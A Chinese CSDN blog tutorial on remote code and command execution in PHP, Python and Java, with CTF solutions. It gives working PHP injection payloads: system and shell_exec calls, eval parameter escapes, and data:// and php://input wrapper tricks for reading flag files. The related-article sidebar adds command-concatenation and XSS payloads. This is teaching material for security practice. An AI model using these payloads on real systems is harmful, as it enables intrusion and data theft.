WEB攻防-通用漏洞&RCE&代码执行&命令执行&多层面检测利用

最新推荐文章于 2024-09-25 09:13:33 发布
最新推荐文章于 2024-09-25 09:13:33 发布
阅读量1k 收藏 1
点赞数
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65336233/article/details/127372983
版权

目录

知识点

1、RCE执行-代码执行&命令执行

2、漏洞

3、举例

CTF例题

CTF-29

CTF-30

CTF-31

CTF-32到36

CTF-37到39

知识点

1、RCE执行-代码执行&命令执行

代码执行:利用脚本代码解析执行-将字符串以代码解析执行

命令执行:利用脚本调用操作系统命令-将字符串放在系统命令中执行

2、漏洞

漏洞场景:代码会调用自身的脚本代码执行,也会调用系统命令执行

漏洞区别:脚本语言&操作系统(php/java/python/js&windows/linux/mac)

漏洞对象:WEB源码&中间件&其他环境(见漏洞详情对象)

漏洞危害:直接权限丢失,可执行任意脚本代码或系统命令

3、举例

<?php

//eval代码执行

eval('phpinfo();');

//system命令执行

system('ipconfig');

?>

-RCE代码执行:引用脚本代码解析执行

-RCE命令执行:脚本调用操作系统命令

漏洞函数:

1.PHP:

eval()、assert()、preg_replace()、call_user_func()、call_user_func_array()以及array_map()等

system、shell_exec、popen、passthru、proc_open等

2.Python:

eval exec subprocess os.system commands

3.Java:

Java中没有类似php中eval函数这种直接可以将字符串转化为代码执行的函数,

但是有反射机制,并且有各种基于反射机制的表达式引擎,如: OGNL、SpEL、MVEL等

CTF例题

CTF-29

system('tac fla*.php');

 存在eval很明显的命令执行漏洞,通过c变量传递指定参数,进行命令执行

 

 

CTF-30

echo shell_exec('tac fla*.ph*');

该关过滤了system,那么直接换个指令函数即可

CTF-31

思路:该可以利用参数逃逸,参数逃逸--当代码对c参数进行过滤时,那么可以让c参数包含另外一个参数,再利用包含的参数执行命令eval($_GET[1]);&1=system('tac flag.php');

 

CTF-32到36

32题到36题方法相同,只展示其中一题

include$_GET[a]?>&a=data://text/plain,<?=system('tac flag.php');?>

include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=flag.php

CTF-37到39

data://text/plain,<?=system('tac fla*');?>

php://input post:<?php system('tac flag.php');?>

 

@墨竹
关注
第30天:WEB漏洞-RCE代码命令执行漏洞全解1
08-03
WEB 漏洞-RCE 代码命令执行漏洞全解在 Web 应用中有时候程序员为了考虑灵活性、简洁性,会在代码调用代码命令执行函数去处理。比如当应用在调用一些能将
Web渗透测试
weixin_70095023的博客
04-19 1563
本章主要概述web常见漏洞原理与危害和渗透测试步骤,流程和方法。
[GXYCTF2019]Ping Ping Ping-rce
2301_79964672的博客
07-26 1041
ping (Packet Internet Groper),中文名称因特网包探索器,是一种计算机网络管理应用,该程序通常被用于确认因特网上的一台主机是否可达 [1]。Ping是工作在TCP/IP网络体系结构中应用层的一个服务命令, 其原理是向特定的目的主机发送ICMP(Internet Control Message Protocol 因特网报文控制协议)Echo。
web系统安全风险攻击测试
夕慕慕的博客
02-27 404
1、SQL注入2、script 脚本url重置,诱骗cookie登录,达到越权操作;3、XSS跨站点脚本攻击,index.do&amp;submitFlag=%22;aler\u0074();//4、浏览器控制台调试点击代码,setTimeout(function(){$('#outputButton').click();},26*10000),按Enter键...
BUUCTFWeb】Exec(命令执行漏洞
qq_70434663的博客
03-02 1181
在根目录中我们发现有一个flag文件,猜测我们的flag就在里面,所以我们需要使用命令来读取flag文件的内容。命令大家可以在网上查看,这里使用的命令是127.0.0.1 & cat /flag(也可以使用127.0.0.1 | cat /flag)了解拼接符后我们先试一下查看目录,发现使用127.0.0.1 && ls执行不了,使用127.0.0.1 & ls有回显。在进入靶场后发现窗口ping,猜测可能是SQL注入,也有可能是命令执行漏洞命令执行就用命令拼接符执行漏洞命令就行。
RCE远程命令/代码执行ctf
m0_74196038的博客
03-02 429
我这里犯了一个错误就是接口选错了,应该选择包含一句话木马的文件,而不是选择那个只包含一句话木马的文件,因为这个一句话木马文件的后缀是txt所以不会执行里面的php代码,必须要使用文件包含的方法把它给包含到php文件中才能解析。这道题是后端提供了eval函数作为接口,来处理我们提交的数据,所以只要提交可以执行系统命令代码即可,使用system函数比较方便。这里里面的flag是被注释了,通过base64编码就可以显示处理,也可以查看页面的源码,这里我使用了base64编码。
命令执行漏洞-命令执行-漏洞位点- 代码注入-漏洞利用-联合执行-Bypass(空格,关键字过滤,变量绕过)-例题两道-actf2020exec-GXYCTF2019 Ping Ping Ping
qq_51550750的博客
02-14 938
命令执行 命令执行是一种攻击,其目标是通过易受攻击的应用程序在主机操作系统上执行任意命令。当应用需要调用一些外部程序去处理内容的情况下,就会用到一些执行系统命令的函数。 比如PHP中的system,exec,shell_exec等,当用户可以控制命令执行中的参数时,将可注入恶意系统命令到正常命令中,造成命令执行攻击。 简单举例来说就是,比如想要创建一个目录,可能不会用代码创建,但是知道系统命令是mkdir,借助系统命令mkdir来创建目录。 举例:cp /tmp/sourcefile /app/public
BUUCTF靶场练习——第一周
weixin_47063945的博客
07-15 1451
整理了buuctf靶场前6道web题目的writeup并整理了涉及到的部分知识的整理和扩展
CVE-2020-36179:CVE-2020-36179~82 Jackson-databind SSRF&RCE
05-29
描述CVE-2020-36179:2.9.10.8之前的FasterXML jackson-databind 2.x处理与oadd.org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS相关的序列化小工具和键入之间的交互。 CVE-2020-36180:FasterXML jackson-...
fastjson-rce-exploit:利用fastjson远程执行代码漏洞
03-15
"fastjson-rce-exploit"正是针对Fastjson中的一个严重安全漏洞——远程代码执行RCE)的利用方法。这个漏洞的存在,使得攻击者有可能通过精心构造的JSON输入,执行任意的远程代码,对目标系统造成严重的危害。 ...
CVE-2021-2109:通过JNDI的CVE-2021-2109 && Weblogic Server RCE
05-26
Oracle Fusion Middleware(组件:控制台)的Oracle WebLogic Server产品中的漏洞。 受影响的受支持版本为10.3.6.0.0、12.1.3.0.0、12.2.1.3.0、12.2.1.4.0和14.1.1.0.0。 容易利用漏洞使高特权攻击者可以通过HTTP...
泛微e-cology OA Beanshell组件远程代码执行漏洞批量检测脚本
09-26
对2019年9月新爆的泛微e-cology OA Beanshell组件远程代码执行漏洞进行漏洞检测。 使用方法: 1、运行url存活检测脚本e-cology_OA_rce.py批量定位泛微OA业务。 e-cology_OA_rce.py –t 1.txt 2、运行检测脚本判断...
CTFWEB题——RCE
tomyyyyy
10-31 6412
CTFWEB题——RCE 目录CTFWEB题——RCE相关函数命令执行代码注入绕过方式空格命令分隔符关键字限制长度限制回显无字母、数字getshell异或取反自增实例相关函数 命令执行 system() #string system ( string $command [, int &$return_var ] ) #system()函数执行有回显,将执行结果输出到页面上 &lt...
基于CTF探讨Web漏洞利用与防范
Welcome To Myon'Blog !
12-20 1617
随着Web2.0、社交网络、微博等等一系列新型的互联网产品的诞生,基于Web环境的互联网应用越来越广泛,企业信息化的过程中各种应用都架设在Web平台上,Web业务的迅速发展也引起黑客们的强烈关注,接踵而至的就是Web安全威胁的凸显,黑客利用网站操作系统的漏洞Web服务程序的SQL注入漏洞等得到Web服务器的控制权限,轻则篡改网页内容,重则窃取重要内部数据,更为严重的则是在网页中植入恶意代码,使得网站访问者受到侵害。这也使得越来越多的用户关注应用层的安全问题,对Web应用安全的关注度也逐渐升温。
CTF题目合集
cgygsw的博客
01-26 3029
在给定的代码中,call_user_func_array(array($this, $this->method), $this->args) 的作用是调用对象 $this 的方法 $this->method(也就是调用ping函数的方法 也就是destruct下面那个ping函数),并将 $this->args 数组作为参数传递给该方法。反序列化之后就会调用wakeup这个函数 : 这个函数的内容 是对参数的内容进行了循环遍历 执行WAF函数的内容。
[ACTF2020 新生赛]Exec (命令执行漏洞
weixin_59233715的博客
12-12 544
OK了家人们看到 flag 了!
CTFSHOW每周大挑战——RCE
qq_61955196的博客
11-21 2875
ctfshow的每周大挑战之RCE的解题方法和一些问题的解决方法和个人总结。
有了这个网络安全面试题,面试就像开了挂!(附PDF)
lvaolan的博客
02-26 958
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
探索光耦:隔离电压——光耦保障电路安全与性能的关键
最新发布
forvevr的博客
09-25 608
在实际应用中,光耦的隔离电压应根据工作环境中的电压等级、电流负载和潜在的电压波动来选择。比如,对于高压电力设备,建议选择隔离电压较高的光耦,以应对突发的电压尖峰或电流浪涌。在现代电子设备和系统中,电气隔离是保障电路稳定运行和安全的重要环节,而光耦(光电耦合器)则是实现这种隔离的核心元件之一。具有较高隔离电压的光耦能在这些波动和干扰中,稳定地工作,确保系统运行的连续性和可靠性。光耦通过将不同电位的电路有效隔离,避免了跨电路间的电流回流对低压电路元件的损害,延长了设备的使用寿命。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值